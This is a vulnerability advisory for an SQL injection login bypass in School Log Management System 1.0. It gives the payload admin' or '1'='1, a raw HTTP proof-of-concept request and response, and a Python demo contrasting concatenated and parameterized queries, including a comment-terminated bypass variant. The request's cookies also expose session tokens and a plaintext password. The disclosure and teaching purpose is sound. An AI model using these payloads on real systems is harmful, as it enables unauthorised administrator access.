
[Description]

School Log Management System was discovered to contain a SQL injection vulnerability in the admin login handler at the URI /admin/ajax.php?action=login. The `username` POST parameter is placed into the login query without sanitization, so an attacker who supplies a crafted username can authenticate as the administrator without knowing the password.


[Vulnerability Type]

SQL Injection


[Vendor of Product]

https://www.sourcecodester.com/php/14562/school-log-management-system-using-phpmysqli-source-code.html


[Affected Product Code Base]

1.0


[Impact Escalation of Privileges]

true


[POC]
Submit the following value as the username and any string as the password; the login succeeds:

admin' or '1'='1

Request :

POST /admin/ajax.php?action=login HTTP/1.1
Host: 192.168.0.183:11180
Content-Length: 40
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.183:11180
Referer: http://192.168.0.183:11180/admin/login.php
Accept-Encoding: gzip, deflate, br
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8,en-US;q=0.7
Cookie: i18next=en; Admin-Token=eyJhbGciOiJIUzUxMiJ9.eyJsb2dpbl91c2VyX2tleSI6ImU0ZjJhZWJmLWVkMDEtNGM0OC04YjU4LTI3OTFjMzllMzFmMCJ9.0J-cqM7f9-cNNDe8_Q3CAiWkq4iyNqLDbBUh6mnYfRl1Ygv4HPIp3Ky1cbbpN3_4Zr8lYluJ5-nEunFvF84Xyw; sidebarStatus=0; pro_end=-1; ltd_end=-1; serverType=nginx; order=id%20desc; memSize=32012; sites_path=/www/wwwroot; distribution=ubuntu; force=0; uploadSize=1073741824; rank=a; form_proxy=%5Bobject%20Object%5D; backup_path=/www/backup; _ga=GA1.1.2111016145.1721287966; _ga_J1DQF09WZC=GS1.1.1721287966.1.1.1721292532.0.0.0; weberp_installation=li98qb9dmcjbkupdsthditlpb3; files_sort=name; showRow=2000; Module=AP; PHPSESSIDwebERPteam=hnbgetkfg5o9mdts1ul0tt7a92; name_reverse=True; copyFileName=null; is_admin=false; cutFileName=null; username=admin; userpwd=admin123456; ispwd=1; BatchPaste=2; pnull=1; p-1=nullnot_load; softType=0; load_type=0; p0=1; load_page=1; load_search=apache; SESSIONID=28d91387-18a2-434a-ae96-03bacb61f632.1ddtyn-D2JpW__TOYHawkV5aWtM; request_token=rgTjWkc5GvhSH7vGBAWa0xRtebrkCk3jDrp3Ii2TdrGU3CbY; layers=5; PHPSESSID=git91lpt9et0atu8q4dg73890i; vcodesum=12; BatchSelected=null; Path=/www/wwwroot/111.com/admin
Connection: keep-alive

username=admin'+or+'1'%3D'1&password=111

Response:

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 26 Jul 2024 03:01:42 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 1

1

The response body '1' is the application's success code: the server has created an authenticated admin session, and reloading /admin/ after this response lands inside the administrative interface.
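Why the payload above works, shown as an added example that is not code from the School Log Management System or from this advisory's author. It uses an in-memory SQLite table as a stand-in for the application's users table (the real schema is not reproduced here) and assumes passwords are stored as MD5 hashes; only the vulnerable pattern (string-concatenated SQL) and its parameterized fix are the point. It also goes one step beyond the page's payload to show that `admin' or '1'='1` relies on AND binding tighter than OR and on the literal `admin` existing, whereas a comment-terminated variant does not need a valid username.

```python
import hashlib
import sqlite3


def setup_db() -> sqlite3.Connection:
    """Constructed stand-in for the application's users table (not the real schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    # Assumption: the app stores md5(password); the advisory does not show the hashing scheme.
    conn.execute(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        ("admin", hashlib.md5(b"s3cret-pass").hexdigest()),
    )
    conn.commit()
    return conn


def render_vulnerable_query(username: str, password: str) -> str:
    """Builds the query the way a vulnerable login handler does: raw string concatenation.

    Whatever the user typed as `username` becomes part of the SQL text, so a single
    quote ends the string literal and the rest is parsed as SQL.
    """
    pw_hash = hashlib.md5(password.encode()).hexdigest()
    return (
        "SELECT id FROM users WHERE username = '" + username + "' "
        "AND password = '" + pw_hash + "'"
    )


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Vulnerable check: returns True when the concatenated query matches any row."""
    row = conn.execute(render_vulnerable_query(username, password)).fetchone()
    return row is not None


def login_fixed(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Hardened check: bound parameters keep the username as data, never as SQL."""
    pw_hash = hashlib.md5(password.encode()).hexdigest()
    row = conn.execute(
        "SELECT id FROM users WHERE username = ? AND password = ?",
        (username, pw_hash),
    ).fetchone()
    return row is not None


if __name__ == "__main__":
    db = setup_db()
    payload = "admin' or '1'='1"          # the advisory's payload
    print(render_vulnerable_query(payload, "111"))
    # WHERE username = 'admin' or '1'='1' AND password = '<md5(111)>'
    # parses as: username = 'admin' OR ('1'='1' AND password = ...), true for the admin row.
    print("vulnerable:", login_vulnerable(db, payload, "111"))   # True
    print("fixed:     ", login_fixed(db, payload, "111"))        # False
    # Precedence matters: with a username that does not exist, the OR branch still
    # needs the correct password, so the page's payload alone fails ...
    print("nonexistent user:", login_vulnerable(db, "nobody' or '1'='1", "111"))  # False
    # ... while commenting out the password clause bypasses it regardless.
    print("comment variant: ", login_vulnerable(db, "nobody' or '1'='1' -- ", "111"))  # True
```

The parameterized version is the fix: the driver sends the username as a bound value, so the quote in the payload is compared literally against the `username` column and no row matches. Any remaining string concatenation in the handler (for example an ORDER BY or table name) would need the same treatment or a strict allow-list.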
